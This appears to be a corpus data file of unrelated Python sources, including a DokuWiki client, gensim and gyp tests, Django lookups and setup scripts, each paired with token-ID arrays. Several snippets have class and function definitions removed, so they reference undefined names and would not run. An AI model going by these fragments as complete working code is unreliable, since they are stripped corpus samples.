none_acceptable=True, is_of_type=numbers.Real, valid_range={ 'Inf': 0, 'Max': 2147483647}) if maximum_categorical_split_point_count is not None: inputs['MaximumCategoricalSplitPointCount'] = try_set( obj=maximum_categorical_split_point_count, none_acceptable=True, is_of_type=numbers.Real, valid_range={ 'Inf': 0, 'Max': 2147483647}) if categorical_smoothing is not None: inputs['CategoricalSmoothing'] = try_set( obj=categorical_smoothing, none_acceptable=True, is_of_type=numbers.Real, valid_range={'Min': 0.0}) if l2_categorical_regularization is not None: inputs['L2CategoricalRegularization'] = try_set( obj=l2_categorical_regularization, none_acceptable=True, is_of_type=numbers.Real, valid_range={'Min': 0.0}) if seed is not None: inputs['Seed'] = try_set( obj=seed, none_acceptable=True, is_of_type=numbers.Real) if parallel_trainer is not None: inputs['ParallelTrainer'] = try_set( obj=parallel_trainer, none_acceptable=True, is_of_type=dict) if predictor_model is not None: outputs['PredictorModel'] = try_set( obj=predictor_model, none_acceptable=False, is_of_type=str) input_variables = { x for x in unlist(inputs.values()) if isinstance(x, str) and x.startswith("$")} output_variables = { x for x in unlist(outputs.values()) if isinstance(x, str) and x.startswith("$")} entrypoint = EntryPoint( name=entrypoint_name, inputs=inputs, outputs=outputs, input_variables=input_variables, output_variables=output_variables) return entrypoint
[ 2, 532, 2980, 515, 416, 4899, 14, 13000, 4122, 62, 5589, 5329, 13, 9078, 25, 466, 407, 4370, 416, 1021, 198, 37811, 198, 44077, 364, 13, 15047, 38, 20475, 33, 3219, 9487, 7483, 198, 37811, 198, 198, 11748, 3146, 198, 198, 6738, 1148...
2.173328
5,354
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz> # Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html """ Automated tests for checking transformation algorithms (the models package). """ import logging import unittest import numpy as np from gensim.corpora.mmcorpus import MmCorpus from gensim.models import rpmodel from gensim import matutils from gensim.test.utils import datapath, get_tmpfile if __name__ == '__main__': logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG) unittest.main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 15069, 357, 34, 8, 3050, 5325, 320, 797, 71, 495, 74, 1279, 6335, 320, 260, 71, 495, 74, 31, 325, 89, ...
2.699571
233
import tensorflow as tf from tensorflow import keras
[ 11748, 11192, 273, 11125, 355, 48700, 198, 6738, 11192, 273, 11125, 1330, 41927, 292, 628, 198 ]
3.4375
16
import base64 import datetime import logging import os import time from typing import List, Tuple import structlog import tenacity from averbis import Pipeline from fhir.resources.bundle import Bundle from fhir.resources.codeableconcept import CodeableConcept from fhir.resources.composition import Composition, CompositionSection from fhir.resources.documentreference import DocumentReference from fhir.resources.fhirtypes import DateTime from fhir.resources.identifier import Identifier from fhir.resources.reference import Reference from fhir.resources.resource import Resource from prometheus_client import Counter, Histogram, Summary from tenacity.after import after_log from ahd2fhir.mappers import ahd_to_condition, ahd_to_medication_statement from ahd2fhir.utils.bundle_builder import BundleBuilder from ahd2fhir.utils.custom_mappers import custom_mappers, mapper_functions from ahd2fhir.utils.device_builder import build_device from ahd2fhir.utils.fhir_utils import sha256_of_identifier MAPPING_FAILURES_COUNTER = Counter("mapping_failures", "Exceptions during mapping") MAPPING_DURATION_SUMMARY = Histogram( "map_duration_seconds", "Time spent mapping", buckets=( 0.05, 0.1, 0.5, 1.0, 2.0, 3.0, 5.0, 8.0, 13.0, 21.0, 34.0, 55.0, "inf", ), ) EXTRACTED_RESOURCES_COUNT_SUMMARY = Summary( "extracted_resources", "Number of extracted resources for each processed document" ) DOCUMENT_LENGTH_SUMMARY = Summary( "document_length", "Length of each processed document's text in charactes", ) DISCHARGE_SUMMARY_CONCEPT_TEXT = ( "Clinical document Kind of document from LOINC Document Ontology" ) DISCHARGE_SUMMARY_CONCEPT = CodeableConcept( **{ "coding": [ { "system": "http://loinc.org", "code": "74477-1", "display": DISCHARGE_SUMMARY_CONCEPT_TEXT, }, ], "text": DISCHARGE_SUMMARY_CONCEPT_TEXT, } ) AHD_TYPE_DOCUMENT_ANNOTATION = "de.averbis.types.health.DocumentAnnotation" AHD_TYPE_MEDICATION = "de.averbis.types.health.Medication" AHD_TYPE_DIAGNOSIS = "de.averbis.types.health.Diagnosis" log = structlog.get_logger()
[ 11748, 2779, 2414, 198, 11748, 4818, 8079, 198, 11748, 18931, 198, 11748, 28686, 198, 11748, 640, 198, 6738, 19720, 1330, 7343, 11, 309, 29291, 198, 198, 11748, 2878, 6404, 198, 11748, 3478, 4355, 198, 6738, 9076, 41907, 1330, 37709, 198,...
2.463124
922
# -*- coding: utf-8 -*- from selectable.decorators import login_required from maestros.models import TiposMedidasActuacion, TiposLimitesCriticos, TiposMedidasVigilancia, TiposTemperaturas, TiposFrecuencias, Zonas, Terceros, CatalogoEquipos, Personal, Consumibles, ParametrosAnalisis, Actividades, Etapas, Peligros, TiposCursos, TiposLegislacion, Unidades, Firmas, HorarioTurnos from selectable.base import ModelLookup from selectable.registry import registry from maestros_generales.models import Empresas from siva import settings __author__ = 'julian' registry.register(TPActuacionPrevLookup) registry.register(TPActuacionCorrLookup) registry.register(TPLimitesCritLookup) registry.register(ActividadesLookup) registry.register(TipoMedidasVigilanciaLookup) registry.register(TiposTemperaturasLookup) registry.register(TiposFrecuenciasLookup) registry.register(ZonasLookup) registry.register(TercerosLookup) registry.register(TercerosTiposLookup) registry.register(CatalogoEquiposLookup) registry.register(PersonalLookup) registry.register(TiposCursosLookup) registry.register(TiposLegislacionLookup) registry.register(ConsumiblesLookup) registry.register(ParametrosAnalisisLookup) registry.register(EtapasLookup) registry.register(PeligrosLookup) registry.register(UnidadesLookup) registry.register(FirmasLookup) registry.register(HorarioTurnoLookup)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 2922, 540, 13, 12501, 273, 2024, 1330, 17594, 62, 35827, 198, 6738, 17266, 395, 4951, 13, 27530, 1330, 23095, 418, 9921, 24496, 6398, 84, 49443, 11, 23095, 418, 19...
2.805274
493
"""Define commands for Python 2.7""" import argparse import traceback from . import util from .cmd import run from .cmd import extractpipenv def main(): """Main function""" print("This version is not supported! It has limitted analysis features") parser = argparse.ArgumentParser(description='Analyze Jupyter Notebooks') subparsers = parser.add_subparsers() run.create_subparsers(subparsers) extractpipenv.create_subparsers(subparsers) args, rest = parser.parse_known_args() try: if not getattr(args, 'func', None): parser.print_help() else: args.func(args, rest) if not util.EXITED: util.do_exit(0) except: # pylint: disable=bare-except if not util.EXITED: traceback.print_exc() util.do_exit(1)
[ 37811, 7469, 500, 9729, 329, 11361, 362, 13, 22, 37811, 198, 11748, 1822, 29572, 198, 11748, 12854, 1891, 198, 198, 6738, 764, 1330, 7736, 198, 6738, 764, 28758, 1330, 1057, 198, 6738, 764, 28758, 1330, 7925, 79, 541, 24330, 198, 198, ...
2.37931
348
#!/usr/bin/env python import os import imp gpcrondump_path = os.path.abspath('gpcrondump') gpcrondump = imp.load_source('gpcrondump', gpcrondump_path) import unittest2 as unittest from datetime import datetime from gppylib import gplog from gpcrondump import GpCronDump from gppylib.operations.utils import DEFAULT_NUM_WORKERS from mock import patch, Mock from gppylib.operations.dump import MailDumpEvent from gppylib.operations.backup_utils import get_backup_directory, write_lines_to_file import mock logger = gplog.get_unittest_logger() #------------------------------- Mainline -------------------------------- if __name__ == '__main__': unittest.main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 848, 198, 31197, 6098, 623, 931, 62, 6978, 796, 28686, 13, 6978, 13, 397, 2777, 776, 10786, 31197, 6098, 623, 931, 11537, 198, 31197, 6098, 623, 931, 796...
3.004505
222
#!/usr/bin/env python ''' Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import os from mock.mock import MagicMock, call, patch from stacks.utils.RMFTestCase import * import datetime, sys, socket import resource_management.libraries.functions
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 7061, 6, 198, 26656, 15385, 284, 262, 24843, 10442, 5693, 357, 1921, 37, 8, 739, 530, 198, 273, 517, 18920, 5964, 11704, 13, 220, 4091, 262, 28536, 2393, 198, 17080, 6169, 351, ...
3.894309
246
#!/usr/bin/env python # Copyright (c) 2017 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Verifies the use of linker flags in environment variables. In this test, gyp and build both run in same local environment. """ import TestGyp import re import subprocess import sys FORMATS = ('make', 'ninja') if sys.platform.startswith('linux'): test = TestGyp.TestGyp(formats=FORMATS) CHDIR = 'ldflags-from-environment' with TestGyp.LocalEnv({'LDFLAGS': '-Wl,--dynamic-linker=/target', 'LDFLAGS_host': '-Wl,--dynamic-linker=/host', 'GYP_CROSSCOMPILE': '1'}): test.run_gyp('test.gyp', chdir=CHDIR) test.build('test.gyp', chdir=CHDIR) if GetDynamicLinker('ldflags') != '/target': test.fail_test() if GetDynamicLinker('ldflags_host') != '/host': test.fail_test() test.pass_test()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 2177, 3012, 3457, 13, 1439, 2489, 10395, 13, 198, 2, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 7635, 5964, 326, 460, 307, 198, 2,...
2.503958
379
# -*- coding: utf-8 -*- from .context import sample
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 6738, 764, 22866, 1330, 6291, 628 ]
2.571429
21
###################################################################### # LeetCode Problem Number : 145 # Difficulty Level : Medium # URL : https://leetcode.com/problems/binary-tree-postorder-traversal/ ###################################################################### from binary_search_tree.tree_node import TreeNode
[ 29113, 29113, 4242, 2235, 198, 2, 1004, 316, 10669, 20647, 7913, 1058, 20299, 198, 2, 27419, 5684, 1058, 13398, 198, 2, 10289, 1058, 3740, 1378, 293, 316, 8189, 13, 785, 14, 1676, 22143, 14, 39491, 12, 21048, 12, 7353, 2875, 12, 9535,...
4.984615
65
# -*- coding: utf-8 -*- """This python module aims to manage `DokuWiki <https://www.dokuwiki.org/dokuwiki>`_ wikis by using the provided `XML-RPC API <https://www.dokuwiki.org/devel:xmlrpc>`_. It is compatible with python2.7 and python3+. Installation ------------ It is on `PyPi <https://pypi.python.org/pypi/dokuwiki>`_ so you can use the ``pip`` command to install it:: pip install dokuwiki Otherwise sources are in `github <https://github.com/fmenabe/python-dokuwiki>`_ """ import re import sys import base64 import weakref from xml.parsers.expat import ExpatError if sys.version_info[0] == 3: from xmlrpc.client import ServerProxy, Binary, Fault, Transport from urllib.parse import urlencode else: from xmlrpclib import ServerProxy, Binary, Fault, Transport from urllib import urlencode from datetime import datetime, timedelta ERR = 'XML or text declaration not at start of entity: line 2, column 0' _URL_RE = re.compile(r'(?P<proto>https?)://(?P<host>[^/]*)(?P<uri>/.*)?') def date(date): """DokuWiki returns dates of `xmlrpclib`/`xmlrpc.client` ``DateTime`` type and the format changes between DokuWiki versions ... This function convert *date* to a `datetime` object. """ date = date.value return (datetime.strptime(date[:-5], '%Y-%m-%dT%H:%M:%S') if len(date) == 24 else datetime.strptime(date, '%Y%m%dT%H:%M:%S')) def utc2local(date): """DokuWiki returns date with a +0000 timezone. This function convert *date* to the local time. """ date_offset = (datetime.now() - datetime.utcnow()) #Python < 2.7 don't have the 'total_seconds' method so calculate it by hand! date_offset = (date_offset.microseconds + (date_offset.seconds + date_offset.days * 24 * 3600) * 1e6) / 1e6 date_offset = int(round(date_offset / 60 / 60)) return date + timedelta(hours=date_offset) def add_acl(self, scope, user, permission): """Add an `ACL <https://www.dokuwiki.org/acl>`_ rule that restricts the page/namespace *scope* to *user* (use *@group* syntax for groups) with *permission* level. It returns a boolean that indicate if the rule was correctly added. """ return self.send('plugin.acl.addAcl', scope, user, permission) def del_acl(self, scope, user): """Delete any ACL matching the given *scope* and *user* (or group if *@group* syntax is used). It returns a boolean that indicate if the rule was correctly removed. """ return self.send('plugin.acl.delAcl', scope, user) class _Pages(object): """This object regroup methods for managing pages of a DokuWiki. This object is accessible from the ``pages`` property of an `DokuWiki` instance:: wiki = dokuwiki.DokuWiki('URL', 'User', 'Password') wiki.pages.list() """ def list(self, namespace='/', **options): """List all pages of the given *namespace*. Valid *options* are: * *depth*: (int) recursion level, 0 for all * *hash*: (bool) do an md5 sum of content * *skipacl*: (bool) list everything regardless of ACL """ return self._dokuwiki.send('dokuwiki.getPagelist', namespace, options) def changes(self, timestamp): """Returns a list of changes since given *timestamp*. For example, for returning all changes since *2016-01-01*:: from datetime import datetime wiki.pages.changes(datetime(2016, 1, 1).timestamp()) """ return self._dokuwiki.send('wiki.getRecentChanges', timestamp) def search(self, string): """Performs a fulltext search on *string* and returns the first 15 results. """ return self._dokuwiki.send('dokuwiki.search', string) def versions(self, page, offset=0): """Returns the available versions of *page*. *offset* can be used to list earlier versions in the history. """ return self._dokuwiki.send('wiki.getPageVersions', page, offset) def info(self, page, version=None): """Returns informations of *page*. Informations of the last version is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageInfoVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPageInfo', page)) def get(self, page, version=None): """Returns the content of *page*. The content of the last version is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPage', page)) def append(self, page, content, **options): """Appends *content* text to *page*. Valid *options* are: * *sum*: (str) change summary * *minor*: (bool) whether this is a minor change """ return self._dokuwiki.send('dokuwiki.appendPage', page, content, options) def html(self, page, version=None): """Returns HTML content of *page*. The HTML content of the last version of the page is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageHTMLVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPageHTML', page)) def set(self, page, content, **options): """Set/replace the *content* of *page*. Valid *options* are: * *sum*: (str) change summary * *minor*: (bool) whether this is a minor change """ try: return self._dokuwiki.send('wiki.putPage', page, content, options) except ExpatError as err: # Sometime the first line of the XML response is blank which raise # the 'ExpatError' exception although the change has been done. This # allow to ignore the error. if str(err) != ERR: raise DokuWikiError(err) def delete(self, page): """Delete *page* by setting an empty content.""" return self.set(page, '') def lock(self, page): """Locks *page*.""" result = self._dokuwiki.send('dokuwiki.setLocks', lock=[page], unlock=[]) if result['lockfail']: raise DokuWikiError('unable to lock page') def unlock(self, page): """Unlocks *page*.""" result = self._dokuwiki.send('dokuwiki.setLocks', lock=[], unlock=[page]) if result['unlockfail']: raise DokuWikiError('unable to unlock page') def permission(self, page): """Returns the permission level of *page*.""" return self._dokuwiki.send('wiki.aclCheck', page) def links(self, page): """Returns a list of all links contained in *page*.""" return self._dokuwiki.send('wiki.listLinks', page) def backlinks(self, page): """Returns a list of all links referencing *page*.""" return self._dokuwiki.send('wiki.getBackLinks', page) class _Medias(object): """This object regroup methods for managing medias of a DokuWiki. This object is accessible from the ``medias`` property of an `DokuWiki` instance:: wiki = dokuwiki.DokuWiki('URL', 'User', 'Password') wiki.medias.list() """ def list(self, namespace='/', **options): """Returns all medias of the given *namespace*. Valid *options* are: * *depth*: (int) recursion level, 0 for all * *skipacl*: (bool) skip acl checking * *pattern*: (str) check given pattern * *hash*: (bool) add hashes to result list """ return self._dokuwiki.send('wiki.getAttachments', namespace, options) def changes(self, timestamp): """Returns the list of medias changed since given *timestamp*. For example, for returning all changes since *2016-01-01*:: from datetime import datetime wiki.medias.changes(datetime(2016, 1, 1).timestamp()) """ return self._dokuwiki.send('wiki.getRecentMediaChanges', timestamp) def get(self, media, dirpath=None, filename=None, overwrite=False, b64decode=False): """Returns the binary data of *media* or save it to a file. If *dirpath* is not set the binary data is returned, otherwise the data is saved to a file. By default, the filename is the name of the media but it can be changed with *filename* parameter. *overwrite* parameter allow to overwrite the file if it already exists locally. """ import os data = self._dokuwiki.send('wiki.getAttachment', media) data = base64.b64decode(data) if b64decode else data.data if dirpath is None: return data if filename is None: filename = media.replace('/', ':').split(':')[-1] if not os.path.exists(dirpath): os.makedirs(dirpath) filepath = os.path.join(dirpath, filename) if os.path.exists(filepath) and not overwrite: raise FileExistsError("[Errno 17] File exists: '%s'" % filepath) with open(filepath, 'wb') as fhandler: fhandler.write(data) def info(self, media): """Returns informations of *media*.""" return self._dokuwiki.send('wiki.getAttachmentInfo', media) def add(self, media, filepath, overwrite=True): """Set *media* from local file *filepath*. *overwrite* parameter specify if the media must be overwrite if it exists remotely. """ with open(filepath, 'rb') as fhandler: self._dokuwiki.send('wiki.putAttachment', media, Binary(fhandler.read()), ow=overwrite) def set(self, media, _bytes, overwrite=True, b64encode=False): """Set *media* from *_bytes*. *overwrite* parameter specify if the media must be overwrite if it exists remotely. """ data = base64.b64encode(_bytes) if b64encode else Binary(_bytes) self._dokuwiki.send('wiki.putAttachment', media, data, ow=overwrite) def delete(self, media): """Delete *media*.""" return self._dokuwiki.send('wiki.deleteAttachment', media) class Dataentry(object): """Object that manage `data entries <https://www.dokuwiki.org/plugin:data>`_."""
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 1212, 21015, 8265, 12031, 284, 6687, 198, 63, 35, 11601, 32603, 1279, 5450, 1378, 2503, 13, 67, 11601, 15466, 13, 2398, 14, 67, 11601, 15466, 29, 63, 62, 4...
2.479991
4,248
import setuptools import re with open("README.md", "r") as fh: long_description = fh.read() # get version from _version.py file, from below # https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package VERSION_FILE = "test_aide/_version.py" version_file_str = open(VERSION_FILE, "rt").read() VERSION_STR_RE = r"^__version__ = ['\"]([^'\"]*)['\"]" mo = re.search(VERSION_STR_RE, version_file_str, re.M) if mo: version = mo.group(1) else: raise RuntimeError("Unable to find version string in %s." % (VERSION_FILE,)) setuptools.setup( name="test-aide", version=version, author="LV GI Data Science Team", author_email="#DataSciencePackages@lv.co.uk", description="Package of helper functions to be used for unit testing", long_description=long_description, long_description_content_type="text/markdown", packages=setuptools.find_packages(), install_requires=list_reqs(), python_requires=">=3.6", classifiers=[ "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Operating System :: OS Independent", "License :: OSI Approved :: BSD License", ], )
[ 11748, 900, 37623, 10141, 198, 11748, 302, 198, 198, 4480, 1280, 7203, 15675, 11682, 13, 9132, 1600, 366, 81, 4943, 355, 277, 71, 25, 198, 220, 220, 220, 890, 62, 11213, 796, 277, 71, 13, 961, 3419, 198, 198, 2, 651, 2196, 422, 48...
2.709091
495
"""Simple matshow() example.""" from matplotlib.pylab import * def samplemat(dims): """Make a matrix with all zeros and increasing elements on the diagonal""" aa = zeros(dims) for i in range(min(dims)): aa[i, i] = i return aa # Display 2 matrices of different sizes dimlist = [(12, 12), (15, 35)] for d in dimlist: matshow(samplemat(d)) # Display a random matrix with a specified figure number and a grayscale # colormap matshow(rand(64, 64), fignum=100, cmap=cm.gray) show()
[ 37811, 26437, 46054, 4919, 3419, 1672, 526, 15931, 198, 6738, 2603, 29487, 8019, 13, 79, 2645, 397, 1330, 1635, 628, 198, 4299, 6291, 6759, 7, 67, 12078, 2599, 198, 220, 220, 220, 37227, 12050, 257, 17593, 351, 477, 1976, 27498, 290, ...
2.642487
193
#! /usr/bin/env python3 import importlib import logging import os import subprocess from setuptools import setup from setuptools.command.install import install as install from setuptools.command.develop import develop as develop logger = logging.getLogger(__name__) stan_model_files = [ os.path.join("nonperiodic", "no-periodicity.stan"), os.path.join("nonperiodic", "start-high-high-low.stan"), os.path.join("nonperiodic", "start-high-low-high.stan"), os.path.join("periodic", "start-high-low-low.stan"), os.path.join("untranslated", "gaussian-naive-bayes.stan"), os.path.join("translated", "periodic-gaussian-mixture.stan") ] stan_pickle_files = [ os.path.join("nonperiodic", "no-periodicity.pkl"), os.path.join("nonperiodic", "start-high-high-low.pkl"), os.path.join("nonperiodic", "start-high-low-high.pkl"), os.path.join("periodic", "start-high-low-low.pkl"), os.path.join("untranslated", "gaussian-naive-bayes.pkl"), os.path.join("translated", "periodic-gaussian-mixture.pkl") ] setup( cmdclass={ 'install': SetupInstall, 'develop': SetupDevelop } )
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 1330, 8019, 198, 11748, 18931, 198, 11748, 28686, 198, 11748, 850, 14681, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 198, 6738, 900, 37623, 10141, 13, 21812, 13, ...
2.566292
445
import os import h5py import nibabel as nb import numpy as np import torch import torch.utils.data as data from torchvision import transforms import utils.preprocessor as preprocessor # transform_train = transforms.Compose([ # transforms.RandomCrop(200, padding=56), # transforms.ToTensor(), # ]) # def load_file_paths(data_dir, label_dir, volumes_txt_file=None): # """ # This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. # It should be modified to suit the need of the project # :param data_dir: Directory which contains the data files # :param label_dir: Directory which contains the label files # :param volumes_txt_file: (Optional) Path to the a csv file, when provided only these data points will be read # :return: list of file paths as string # """ # # volume_exclude_list = ['IXI290', 'IXI423'] # if volumes_txt_file: # with open(volumes_txt_file) as file_handle: # volumes_to_use = file_handle.read().splitlines() # else: # volumes_to_use = [name for name in os.listdir(data_dir) if # name.startswith('IXI') and name not in volume_exclude_list] # # file_paths = [ # [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol, 'mri/aseg.auto_noCCseg.mgz')] # for # vol in volumes_to_use] # return file_paths def load_file_paths(data_dir, label_dir, data_id, volumes_txt_file=None): """ This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. It should be modified to suit the need of the project :param data_dir: Directory which contains the data files :param label_dir: Directory which contains the label files :param data_id: A flag indicates the name of Dataset for proper file reading :param volumes_txt_file: (Optional) Path to the a csv file, when provided only these data points will be read :return: list of file paths as string """ if volumes_txt_file: with open(volumes_txt_file) as file_handle: volumes_to_use = file_handle.read().splitlines() else: volumes_to_use = [name for name in os.listdir(data_dir)] if data_id == "MALC": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol + '_glm.mgz')] for vol in volumes_to_use] elif data_id == "ADNI": file_paths = [ [os.path.join(data_dir, vol, 'orig.mgz'), os.path.join(label_dir, vol, 'Lab_con.mgz')] for vol in volumes_to_use] elif data_id == "CANDI": file_paths = [ [os.path.join(data_dir, vol + '/' + vol + '_1.mgz'), os.path.join(label_dir, vol + '/' + vol + '_1_seg.mgz')] for vol in volumes_to_use] elif data_id == "IBSR": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol + '_map.nii.gz')] for vol in volumes_to_use] elif data_id == "BORIS": #BORIS file_paths = [ [os.path.join(data_dir, vol), os.path.join(label_dir, vol.replace('.nii', '_seg.nii'))] for vol in volumes_to_use] else: raise ValueError("Invalid entry, valid options are MALC, ADNI, CANDI and IBSR") return file_paths def load_file_paths_eval(data_dir, volumes_txt_file, dir_struct): """ This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. It should be modified to suit the need of the project :param data_dir: Directory which contains the data files :param volumes_txt_file: Path to the a csv file, when provided only these data points will be read :param dir_struct: If the id_list is in FreeSurfer style or normal :return: list of file paths as string """ with open(volumes_txt_file) as file_handle: volumes_to_use = file_handle.read().splitlines() if dir_struct == "FS": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz')] for vol in volumes_to_use] elif dir_struct == "Linear": file_paths = [ [os.path.join(data_dir, vol)] for vol in volumes_to_use] elif dir_struct == "part_FS": file_paths = [ [os.path.join(data_dir, vol, 'orig.mgz')] for vol in volumes_to_use] else: raise ValueError("Invalid entry, valid options are FS and Linear") return file_paths
[ 11748, 28686, 198, 198, 11748, 289, 20, 9078, 198, 11748, 33272, 9608, 355, 299, 65, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28034, 198, 11748, 28034, 13, 26791, 13, 7890, 355, 1366, 198, 6738, 28034, 10178, 1330, 31408, 198, 11...
2.340405
2,027
import argparse import yaml import sys from .conf import MysqlConf from lib.db import mysql parser = argparse.ArgumentParser() parser.add_argument("--config", help="config file name", type=str, required=False, default='office') input_args = parser.parse_args()
[ 11748, 1822, 29572, 198, 11748, 331, 43695, 198, 11748, 25064, 198, 6738, 764, 10414, 1330, 337, 893, 13976, 18546, 198, 6738, 9195, 13, 9945, 1330, 48761, 198, 198, 48610, 796, 1822, 29572, 13, 28100, 1713, 46677, 3419, 198, 48610, 13, ...
3.384615
78
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'design.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 201, 198, 2, 5178, 7822, 7560, 422, 3555, 334, 72, 2393, 705, 26124, 13, 9019, 6, 201, 198, 2, 201, 198, 2, 15622, 416, 25, 9485, 48, 83, 20, 12454, 2438, 173...
2.804878
123
from simulation.car import spawn_drivers from simulation.passenger import spawn_passengers from simulation.core import World, Clock conf = { "x": 100, "y": 100, "drivers": 200, "users": 1000, "start": "2019-07-08T00:00:00", "end": "2019-07-08T00:01:00" } clock = Clock(conf["start"], conf["end"]) if __name__ == '__main__': world = World([conf['x'], conf['y']], clock=clock) world.register_drivers(spawn_drivers(conf["drivers"], conf['x'], conf['y'])) world.register_passengers(spawn_passengers(conf["users"], conf['x'], conf['y'])) world.run(log=False)
[ 6738, 18640, 13, 7718, 1330, 10922, 62, 36702, 198, 6738, 18640, 13, 6603, 6540, 1330, 10922, 62, 6603, 9302, 198, 6738, 18640, 13, 7295, 1330, 2159, 11, 21328, 198, 198, 10414, 796, 1391, 198, 220, 220, 220, 366, 87, 1298, 1802, 11, ...
2.584416
231
#!/bin/python3 import math import os import random import re import sys # # Complete the 'reverse_words_order_and_swap_cases' function below. # # The function is expected to return a STRING. # The function accepts STRING sentence as parameter. # sentence = input() news = reverse_words_order_and_swap_cases(sentence) print(news)
[ 2, 48443, 8800, 14, 29412, 18, 198, 198, 11748, 10688, 198, 11748, 28686, 198, 11748, 4738, 198, 11748, 302, 198, 11748, 25064, 628, 198, 2, 198, 2, 13248, 262, 705, 50188, 62, 10879, 62, 2875, 62, 392, 62, 2032, 499, 62, 33964, 6, ...
3.180952
105
import json d1 = {} with open("/home/qinyuan/zs/out/bart-large-with-description-grouped-1e-5-outerbsz4-innerbsz32-adapterdim4-unfreeze-dec29/test_predictions.jsonl") as fin: for line in fin: d = json.loads(line) d1[d["id"]] = d["output"][0]["answer"] d2 = {} dq = {} with open("/home/qinyuan/zs/out/bart-large-zsre-with-description-LR2e-5-FREQ32-dec27/test_predictions_submitted.jsonl") as fin: for line in fin: d = json.loads(line) d2[d["id"]] = d["output"][0]["answer"] dq[d["id"]] = d["input"] d3 = {} with open("/home/qinyuan/zs/data/structured_zeroshot-test.jsonl") as fin: for line in fin: d = json.loads(line) d3[d["id"]] = [item["answer"] for item in d["output"]] count = 0 win1 = 0 win2 = 0 for key in d1.keys(): if d1[key]!= d2[key]: print("{}. {}. {}. {}. {}".format(key, dq[key], d1[key], d2[key], d3[key])) count += 1 if d1[key] in d3[key] and d2[key] not in d3[key]: win1 += 1 print(d1[key]) print(d2[key]) if d2[key] in d3[key] and d1[key] not in d3[key]: win2 += 1 print(d1[key]) print(d2[key]) print(count) print(win1) print(win2)
[ 11748, 33918, 198, 198, 67, 16, 796, 23884, 198, 4480, 1280, 7203, 14, 11195, 14, 80, 3541, 7258, 14, 89, 82, 14, 448, 14, 16575, 12, 11664, 12, 4480, 12, 11213, 12, 8094, 276, 12, 16, 68, 12, 20, 12, 39605, 1443, 89, 19, 12, ...
1.886364
660
import json, requests from pprint import pprint CREEDS_URL = 'http://amp.pharm.mssm.edu/CREEDS/' response = requests.get(CREEDS_URL + 'search', params={'q':'STAT3'}) if response.status_code == 200: pprint(response.json()) json.dump(response.json(), open('api1_result.json', 'wb'), indent=4)
[ 11748, 33918, 11, 7007, 198, 6738, 279, 4798, 1330, 279, 4798, 198, 198, 43387, 1961, 50, 62, 21886, 796, 705, 4023, 1378, 696, 13, 746, 1670, 13, 76, 824, 76, 13, 15532, 14, 43387, 1961, 50, 14, 6, 198, 26209, 796, 7007, 13, 1136...
2.672727
110
# Generated by Django 2.2.3 on 2019-07-31 13:54 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 18, 319, 13130, 12, 2998, 12, 3132, 1511, 25, 4051, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
